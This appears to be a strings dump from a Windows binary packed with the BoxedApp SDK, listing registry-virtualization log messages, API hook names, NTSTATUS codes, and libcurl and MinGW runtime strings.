C62E2B35-E4B3-4019-A7C4-F50AC7F78470
Get exe dir...
Get exe dir...done
Get the extension...done
Get current dir...done
Get old args...done
The command line overriding: %s
GetCommandLineW preparing to intercept...done
GetCommandLineA preparing to intercept...done
The embedding BoxedApp into child processes: %s
GetWindowsDirectoryW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
ADVAPI32.dll
ole32.dll
EXEPackerStub32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
RegOpenKeyExW
RegOpenKeyW
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
P`.data
.edata
[email protected]
libgcj_s.dll
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
%c%c==
%c%c%c=
%c%c%c%c
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
timeout on name lookup is not supported
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
p.jpg
p.jpeg
p.txt
p.html
p.xml
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
Avoided giant realloc for header (max is %d)!
HTTP/
The requested URL returned error: %d
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
%sAuthorization: Basic %s
%s auth using %s with user '%s'
Referer: %s
Accept-Encoding: %s
%s, TE
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
;type=%c
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
[%s %s %s]
Recv failure: %s
Send failure: %s
/etc/ssl/certs/ca-certificates.crt
IDN support not present, can't parse Unicode domains
Connected to %s (%s) port %ld (#%ld)
%5[^:@]:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Curl_addHandleToPipeline: length: %d
Closing connection %d
Connection #%ld to host %s left intact
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
[^:]:%[^
:]://%[^
 malformed
:%5[^@]
Protocol %s not supported or disabled in libcurl
%s://%s
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
zlib/%s
7.30.0
%%X
login
password
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
No URL set!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
operation aborted by callback
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
pUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
psa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
pInternal error clearing splay node = %d
Internal error removing splay node = %d
pPipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Error while processing content unencoding: %s
1.2.8
1.2.0.4
px
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Please call curl_multi_perform() soon
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Curl_ipv4_resolve_r failed for %s
%d.%d.%d.%d
d:d:d
d:d
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
00000001
12345678
%s xxxxxxxxxxxxxxxx
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Server %s is blacklisted
Server %s is not blacklisted
Site %s:%d is pipeline blacklisted
Adding handle: send: %d
Adding handle: recv: %d
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
curl_easy_duphandle
curl_easy_escape
curl_easy_getinfo
curl_easy_pause
curl_easy_recv
curl_easy_send
curl_easy_strerror
curl_easy_unescape
curl_escape
curl_formadd
curl_formfree
curl_formget
curl_free
curl_getdate
curl_getenv
curl_global_cleanup
curl_global_init_mem
curl_maprintf
curl_mfprintf
curl_mprintf
curl_msnprintf
curl_msprintf
curl_multi_add_handle
curl_multi_assign
curl_multi_cleanup
curl_multi_fdset
curl_multi_info_read
curl_multi_init
curl_multi_perform
curl_multi_remove_handle
curl_multi_setopt
curl_multi_socket
curl_multi_socket_action
curl_multi_socket_all
curl_multi_strerror
curl_multi_timeout
curl_multi_wait
curl_mvaprintf
curl_mvfprintf
curl_mvprintf
curl_mvsnprintf
curl_mvsprintf
curl_share_cleanup
curl_share_init
curl_share_setopt
curl_share_strerror
curl_strequal
curl_strnequal
curl_unescape
curl_version_info
ADVAPI32.DLL
WS2_32.DLL
zlib1.dll
DllMainCRTStartup
GNU C 4.2.1-sjlj (mingw32-2)
/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c
 DllMainCRTStartup@12
dllcrt1.c
.file
http.c
ftp.c
url.c
_Curl_do
curl_fnmatch.c
ftplistparser.c
http_chunks.c
http_digest.c
curl_rand.c
http_negotiate.c
tftp.c
ssh.c
curl_addrinfo.c
curl_sspi.c
curl_memrchr.c
smtp.c
curl_threads.c
curl_rtmp.c
curl_gethostname.c
http_proxy.c
curl_gssapi.c
curl_ntlm.c
curl_ntlm_wb.c
curl_ntlm_core.c
curl_ntlm_msgs.c
curl_sasl.c
curl_schannel.c
curl_multibyte.c
curl_darwinssl.c
pipeline.c
.debug_aranges
.debug_pubnames
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_loc
_DllMainCRTStartup@12
_curlx_tvdiff
_curlx_tvdiff_secs
_Curl_tvlong
_curlx_tvnow
_Curl_base64_encode
_Curl_base64_decode
_Curl_num_addresses
_Curl_resolv_unlock
_Curl_hostcache_clean
_Curl_hostcache_destroy
_Curl_mk_dnscache
_Curl_hostcache_prune
_Curl_cache_addr
_Curl_loadhostpairs
_Curl_resolv
_Curl_resolv_timeout
_Curl_printable_address
_Curl_global_host_cache_dtor
_Curl_global_host_cache_init
_Curl_pgrsSetDownloadCounter
_Curl_pgrsSetUploadCounter
_Curl_pgrsSetDownloadSize
_Curl_pgrsSetUploadSize
_Curl_pgrsResetTimesSizes
_Curl_pgrsStartNow
_Curl_pgrsUpdate
_Curl_pgrsDone
_Curl_pgrsTime
_Curl_formclean
_curl_formfree
_Curl_FormInit
_Curl_formpostheader
_Curl_FormReader
_Curl_getformdata
_curl_formget
_curl_formadd
_Curl_cookie_freelist
_Curl_cookie_clearall
_Curl_cookie_clearsess
_Curl_cookie_cleanup
_Curl_cookie_list
_Curl_cookie_getlist
_Curl_cookie_add
_Curl_cookie_init
_Curl_cookie_loadfiles
_Curl_flush_cookies
_http_should_fail
_Curl_add_buffer_init
_http_getsock_do
_use_http_1_1
_Curl_add_buffer
_checkhttpprefix
_Curl_checkheaders
_Curl_compareheader
_http_perhapsrewind
_Curl_http_auth_act
_Curl_http_done
_Curl_http_connect
_Curl_add_bufferf
_Curl_add_timecondition
_Curl_add_custom_headers
_Curl_add_buffer_send
_Curl_http_input_auth
_Curl_http_output_auth
_Curl_http
_Curl_http_readwrite_headers
_Curl_write
_Curl_debug
_Curl_read
_Curl_read_plain
_Curl_sendf
_Curl_failf
_Curl_client_write
_Curl_recv_plain
_Curl_send_plain
_Curl_write_plain
_Curl_infof
_Curl_freeset
_Curl_init_userdefined
_Curl_protocol_getsock
_Curl_doing_getsock
_Curl_protocol_connecting
_Curl_protocol_doing
_Curl_reset_reqproto
_Curl_do_more
_Curl_verboseconnect
_Curl_isPipeliningEnabled
_IsPipeliningPossible
_parse_remote_port
_Curl_open
_Curl_protocol_connect
_Curl_connected_proxy
_Curl_setup_conn
_Curl_removeHandleFromPipeline
_Curl_getoff_all_pipelines
_Curl_addHandleToPipeline
_signalPipeClose
_Curl_disconnect
_Curl_done
_Curl_handler_dummy
_Curl_connect
_Curl_setopt
_Curl_close
_Curl_dupset
_Curl_if_is_interface_name
_Curl_if2ip
_Curl_speedcheck
_Curl_speedinit
_curl_version_info
_curl_version
_curl_getenv
_curl_free
_Curl_urldecode
_curl_easy_unescape
_curl_unescape
_curl_easy_escape
_curl_escape
_curl_msnprintf
_curl_mvfprintf
_curl_mvprintf
_curl_mvsprintf
_curl_mfprintf
_curl_mprintf
_curl_msprintf
_curl_mvaprintf
_curl_maprintf
_curl_mvsnprintf
_Curl_parsenetrc
_Curl_initinfo
_Curl_getinfo
_Curl_single_getsock
_Curl_sleep_time
_Curl_posttransfer
_strlen_url
_strcpy_url
_Curl_setup_transfer
_Curl_meets_timecondition
_Curl_reconnect_request
_Curl_follow
_Curl_pretransfer
_Curl_readrewind
_Curl_retry_request
_Curl_fillreadbuffer
_Curl_readwrite
_curl_strnequal
_curl_strequal
_Curl_easy_addmulti
_curl_easy_send
_curl_easy_recv
_curl_easy_pause
_Curl_easy_initHandleData
_curl_easy_reset
_curl_easy_duphandle
_curl_easy_getinfo
_curl_easy_cleanup
_curl_easy_perform
_curl_easy_setopt
_curl_global_cleanup
_curl_global_init
_curl_easy_init
_curl_global_init_mem
_Curl_fnmatch
_Curl_fileinfo_dtor
_Curl_fileinfo_alloc
_Curl_wildcard_dtor
_Curl_wildcard_init
_Curl_httpchunk_init
_Curl_httpchunk_read
_Curl_strtok_r
_Curl_persistconninfo
_Curl_socket
_Curl_closesocket
_Curl_getconnectinfo
_Curl_timeleft
_Curl_sndbufset
_Curl_connecthost
_Curl_updateconninfo
_Curl_is_connected
_Curl_llist_alloc
_Curl_llist_insert_next
_Curl_llist_remove
_Curl_llist_destroy
_Curl_llist_count
_Curl_llist_move
_Curl_hash_pick
_Curl_hash_str
_Curl_hash_start_iterate
_Curl_hash_next_element
_Curl_str_key_compare
_Curl_hash_clean_with_criterium
_Curl_hash_delete
_Curl_hash_clean
_Curl_hash_destroy
_Curl_hash_add
_Curl_hash_init
_Curl_hash_alloc
_fd_key_compare
_multi_freeamsg
_Curl_multi_pipeline_enabled
_Curl_multi_handlePipeBreak
_Curl_multi_set_easy_connection
_Curl_multi_max_host_connections
_Curl_multi_max_total_connections
_Curl_multi_max_pipeline_length
_Curl_multi_content_length_penalty_size
_Curl_multi_chunk_length_penalty_size
_Curl_multi_pipelining_site_bl
_Curl_multi_pipelining_server_bl
_curl_multi_assign
_Curl_expire
_Curl_multi_process_pending_handles
_curl_multi_timeout
_curl_multi_fdset
_curl_multi_setopt
_curl_multi_info_read
_curl_multi_cleanup
_curl_multi_perform
_curl_multi_socket_all
_curl_multi_socket_action
_curl_multi_socket
_curl_multi_wait
_curl_multi_remove_handle
_curl_multi_add_handle
_curl_multi_init
_Curl_unencode_cleanup
_Curl_unencode_gzip_write
_Curl_unencode_deflate_write
_curl_share_init
_Curl_share_lock
_Curl_share_unlock
_curl_share_cleanup
_curl_share_setopt
_Curl_digest_cleanup
_Curl_output_digest
_Curl_input_digest
_Curl_MD5_init
_Curl_MD5_update
_Curl_MD5_final
_Curl_md5it
_Curl_rand
_Curl_srand
_Curl_inet_pton
_curl_easy_strerror
_curl_multi_strerror
_curl_share_strerror
_Curl_strerror
_Curl_ipvalid
_Curl_ipv4_resolve_r
_Curl_getaddrinfo
_Curl_set_dns_servers
_Curl_inet_ntop
_Curl_gmtime
_curl_getdate
_Curl_wait_ms
_Curl_poll
_Curl_socket_check
_Curl_clone_ssl_config
_Curl_free_ssl_config
_Curl_ssl_config_matches
_Curl_splay
_Curl_splayinsert
_KEY_NOTUSED.17658
_Curl_splaygetbest
_Curl_splayremovebyaddr
_Curl_blockread_all
_Curl_SOCKS5
_Curl_SOCKS4
_Curl_raw_toupper
_Curl_raw_equal
_Curl_raw_nequal
_Curl_strntoupper
_Curl_freeaddrinfo
_Curl_he2ai
_Curl_ip2addr
_Curl_str2addr
_curl_slist_append
_curl_slist_free_all
_Curl_slist_duplicate
_curlx_nonblock
_Curl_memrchr
_curlx_ultous
_curlx_ultouc
_curlx_ultosi
_curlx_uztosi
_curlx_uztoul
_curlx_uztoui
_curlx_sltosi
_curlx_sltoui
_curlx_sltous
_curlx_uztosz
_curlx_sotouz
_curlx_sztosi
_curlx_sitouz
_curlx_sktosi
_curlx_sitosk
_Curl_HMAC_init
_Curl_HMAC_update
_Curl_HMAC_final
_Curl_gethostname
http_negotiate_sspi.c
_Curl_proxyCONNECT
_Curl_proxy_connect
_Curl_sasl_cleanup
_Curl_sasl_create_login_message
_sasl_digest_get_key_value
_Curl_sasl_create_digest_md5_message
_Curl_sasl_create_cram_md5_message
_Curl_sasl_create_plain_message
_Curl_bundle_remove_conn
_Curl_bundle_add_conn
_Curl_bundle_destroy
_Curl_bundle_create
_Curl_conncache_find_first_connection
_Curl_conncache_foreach
_Curl_conncache_remove_conn
_Curl_conncache_find_bundle
_Curl_conncache_add_conn
_Curl_conncache_destroy
_Curl_conncache_init
_print_pipeline
_Curl_pipeline_set_server_blacklist
_Curl_pipeline_server_blacklisted
_Curl_pipeline_set_site_blacklist
_Curl_pipeline_site_blacklisted
_Curl_move_handle_from_send_to_recv_pipe
_Curl_add_handle_to_pipeline
_Curl_pipeline_penalized
.weak.__Jv_RegisterClasses.___gcc_register_frame
__libmsvcrt_a_iname
_Curl_handler_http
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
_Curl_crealloc
_Curl_cfree
_Curl_HMAC_MD5
_Curl_wkday
___crt_xp_start__
_Curl_handler_file
___crt_xp_end__
__head_libmsvcrt_a
_Curl_ccalloc
___crt_xc_end__
___crt_xc_start__
_Curl_DIGEST_MD5
_Curl_cmalloc
_Curl_month
_Curl_cstrdup
___crt_xt_start__
_Curl_cwcsdup
___crt_xt_end__
_Curl_ack_eintr
0`.data
[email protected]
libgcc_s_dw2-1.dll
\QUSEREX.DLL
pthread_key_create
pthread_key_delete
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/dllcrt1.c
C:\MinGW\msys\1.0\src\mingwrt
-DllMainCRTStartup@12
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
cygming-crtbegin.c
.tls$AAA
.tls$ZZZ
.CRT$XLA
.CRT$XLZ
.CRT$XLC
.CRT$XLD
